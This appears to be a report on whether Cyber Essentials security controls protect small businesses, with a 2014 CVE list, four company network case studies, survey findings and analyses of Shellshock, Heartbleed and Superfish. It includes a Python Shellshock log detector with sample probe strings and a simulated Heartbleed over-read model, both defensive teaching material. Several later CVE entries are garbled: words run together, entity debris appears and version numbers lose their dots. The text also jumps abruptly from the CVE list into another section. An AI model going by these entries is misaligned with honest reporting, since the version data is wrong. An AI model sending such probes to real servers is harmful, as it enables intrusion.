CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.
CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.
CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.
CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."
CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.
CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.
CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.
CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
Survey Responses
strong passwords, which are recommended to be changed periodically, with the employee machines configured to lock automatically after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 116 were applicable to the third SME network (SME-3).

Figure 10: SME-3 Vulnerability Mitigation

The requirement for web development SMEs to operate across multiple web browsers, on various versions, to test and build a customer's website means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place: when working on alternative browsers, employees should only access client pages where the developer has control of the web content.
SME Network Four - Hotel Services

Figure 11: SME-4 Network

Physical Infrastructure: This company is located at a single site, and its equipment consists of a single desktop PC and two company laptops running on an ADSL router; this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.

The guest network is split from the office network through secondary access point names, filtering traffic into a separate VLAN internal to the router.

Services: No local servers are present to provide any service to employees or guests on the network.

File storage is provided through on-line services, including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed with SSL-secured connections (HTTPS, mainly).

User Access: User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating Systems: The company uses iOS for its mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so there will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

Existing Security Measures: Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do have automatic patch installation configured, however, and have the Kaspersky antivirus suite installed.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network (SME-4).

Figure 12: SME-4 Vulnerability Mitigation

Similarly to SME 1, SME 4 requires the use of web browsers for bookings and the reception of guests, and so opens up a wide variety of attack vectors through the web.

Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services they use must also not have, leaving them open to attack.
Survey Responses

Data gathered from survey responses affords a much broader look at the typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical Infrastructure: The majority of respondents belong to SMEs with 0-9 workstations on site. This is related to the size of an organisation, and could be considered representative of businesses across the UK.

Services: Local - File, Email, Database and Domain servers are the most common local service providers, all present in more than a third of SMEs. Remote - Email, web hosting and file-sharing are the most common services provided remotely.

User Access: More than half of SMEs permit employees' own devices to be used in the workplace. For organisations such as these it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine exposes the whole company.

Existing Security Measures: Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below these are access control, malware protection and finally patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.

Survey Respondents Network

The network built from survey respondents' data considers the overall response in order to build a network easily adaptable to match the majority of SME network configurations.

Locally, Email and File servers have been represented, with domain controller capabilities represented in a network ADSL router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.
Figure 13: Adaptable Survey-Response Network

Typicality of Case-Study SMEs

Within the Survey Respondents network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information will be likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.
Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015. These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.

"ShellShock"

Also known by the name "BashDoor", Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.

    GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock". NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

    CVE-2014-6271 [13]

The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix based servers for services (mail servers, as an example), as they would potentially have no idea that they had been compromised.
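The CVE text above names CGI as one path by which attacker-supplied environment variables reach bash: web servers export request headers to CGI scripts as environment variables, so a Shellshock attempt leaves its "() {" function-definition prefix in the web server's access log. The following Python script is an added example, not part of the original report, that scans combined-format access log lines for that prefix in the request line, Referer and User-Agent fields. The log lines are constructed samples using documentation IP ranges and a harmless payload.

```python
import re
from typing import Dict, List, Optional

# Apache/nginx "combined" log format:
# host ident authuser [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# CVE-2014-6271 is triggered by an environment variable whose value starts
# with a bash function definition, "() {", followed by trailing text that a
# vulnerable bash (4.3 and earlier) executed while importing the variable.
# CGI passes request headers to scripts as environment variables, so the
# pattern shows up in the User-Agent, Referer or request line of web logs.
# Whitespace between "(", ")" and "{" is optional, so it is matched loosely.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Header-derived fields that a CGI handler exports to the environment.
SCANNED_FIELDS = ('request', 'referer', 'agent')


def is_shellshock_probe(value: str) -> bool:
    """True if a header value carries the function-definition prefix."""
    return SHELLSHOCK_RE.search(value) is not None


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields; None if malformed."""
    match = LOG_RE.match(line.rstrip('\n'))
    return match.groupdict() if match else None


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per (line, field) in which the probe pattern occurs."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # not combined format; a real deployment would log this
        for field in SCANNED_FIELDS:
            if is_shellshock_probe(entry[field]):
                findings.append({
                    'host': entry['host'],
                    'time': entry['time'],
                    'field': field,
                    'value': entry[field],
                })
    return findings


# Constructed sample log lines (documentation IP ranges, harmless payloads).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1043 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/32.0"',
    '198.51.100.7 - - [25/Sep/2014:10:00:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 '
    '"-" "() { :;}; echo vulnerable"',
    '198.51.100.7 - - [25/Sep/2014:10:00:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 12 '
    '"() { :; }; echo probe" "curl/7.38.0"',
    '203.0.113.9 - - [25/Sep/2014:10:00:04 +0000] "GET /docs/functions() HTTP/1.1" 404 210 '
    '"-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['time']} {finding['host']} {finding['field']}: {finding['value']}")
```

The fourth sample line shows why the pattern requires the opening brace: ordinary parentheses in a URL or a browser User-Agent string are not flagged. A hit in the log is evidence of an attempt, not of success; whether the server was vulnerable depends on the bash version behind the CGI handler, which is exactly what the patch management control addresses.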
"Heartbleed"

Appearing in April 2014, the CVE-2014-0160 (aka "Heartbleed") bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.

As described in the original CVE report:

    The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

    CVE-2014-0160 [12]

As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-unupdated servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use, and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
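To make the "buffer over-read" concrete, the following Python model is an added example (not code from the report or from OpenSSL) of the heartbeat message layout from RFC 6520 and of the two behaviours the CVE text contrasts: a responder that trusts the peer's declared payload_length and copies that many bytes from wherever the record sits in memory, beside the 1.0.1g-style check that discards any message whose declared payload, header and minimum padding do not fit in the received record. Process memory is simulated with a constructed byte string; no network traffic is involved.

```python
import struct
from typing import Dict, Optional

# TLS HeartbeatMessage layout (RFC 6520):
#   type (1 byte) | payload_length (2 bytes) | payload | padding (>= 16 bytes)
HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
HEADER_LEN = 1 + 2
PADDING_LEN = 16


def build_heartbeat(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """Encode a heartbeat request. claimed_length lets a test declare a
    payload_length that disagrees with the bytes actually sent."""
    if claimed_length is None:
        claimed_length = len(payload)
    return (struct.pack('!BH', HEARTBEAT_REQUEST, claimed_length)
            + payload + b'\x00' * PADDING_LEN)


def respond_unchecked(record: bytes, process_memory: bytes) -> bytes:
    """Illustration of the OpenSSL 1.0.1 to 1.0.1f behaviour: payload_length
    is taken from the peer and that many bytes are copied starting at the
    record's location in memory, with no comparison against the record length.
    process_memory is a constructed stand-in for the heap around the record."""
    _, payload_length = struct.unpack('!BH', record[:HEADER_LEN])
    start = HEADER_LEN
    return (struct.pack('!BH', HEARTBEAT_RESPONSE, payload_length)
            + process_memory[start:start + payload_length])


def respond_checked(record: bytes) -> Optional[bytes]:
    """The 1.0.1g-style fix: discard the message when the declared payload,
    header and minimum padding would not fit inside the received record."""
    if len(record) < HEADER_LEN:
        return None
    hb_type, payload_length = struct.unpack('!BH', record[:HEADER_LEN])
    if hb_type != HEARTBEAT_REQUEST:
        return None
    if HEADER_LEN + payload_length + PADDING_LEN > len(record):
        return None  # silently drop, as the patched code does
    payload = record[HEADER_LEN:HEADER_LEN + payload_length]
    return struct.pack('!BH', HEARTBEAT_RESPONSE, payload_length) + payload


# Constructed stand-in for data that happens to sit next to the record on
# the heap (in the real incident this was session data and private keys).
SECRET = b'[constructed secret: key material that follows the record in memory]'


def demo() -> Dict[str, bool]:
    honest = build_heartbeat(b'ping')                    # 4 bytes sent, 4 declared
    lying = build_heartbeat(b'ping', claimed_length=60)  # 4 bytes sent, 60 declared
    memory = lying + SECRET                              # record followed by other data

    leaked = respond_unchecked(lying, memory)
    return {
        'honest_ok': respond_checked(honest) is not None,
        'lying_dropped': respond_checked(lying) is None,
        'unchecked_leaks_secret': SECRET[:20] in leaked,
    }


if __name__ == '__main__':
    print(demo())
```

The length check is the whole fix: a well-formed heartbeat always satisfies `1 + 2 + payload_length + 16 <= record length`, so anything that fails it can be dropped without affecting legitimate peers. The model also shows why patch management is the only control that removes the flaw; a firewall that admits TLS at all admits these records.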
"Superfish"

    The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.

    CVE-2015-2077 [14]

This vulnerability is particularly interesting, as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo's and other manufacturers' equipment.

The vector is through the SuperFish software, which essentially breaks the chain of trust for SSL certificates by installing a self-signed root certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own certificates with the same root certificate, whose private key can be easily gathered from any other machine running SuperFish, giving them full access to any SSL-secured connection from the target machine.

Thankfully, while the risk to users and SMEs was high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and is mitigated fully through the Cyber Essentials patch management advice.
Threat Analysis

ShellShock: Without Cyber Essentials in place, SME 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.

With Cyber Essentials, SME 1 and 2 would be fully protected, and it is likely that SME 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed: The 'Heartbleed' bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.

SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.
Conclusions

The Cyber Essentials security tools have been shown to mitigate (or to mitigate as soon as a patch is released) all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two-hundred vulnerabilities collected, eight exploits were not able to be resolved with the deployment of security patches; for vulnerabilities such as these, the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope: It is important to consider that the scope of this study covers only internet-based, commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least malicious acts, but also users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.
Additional Tools

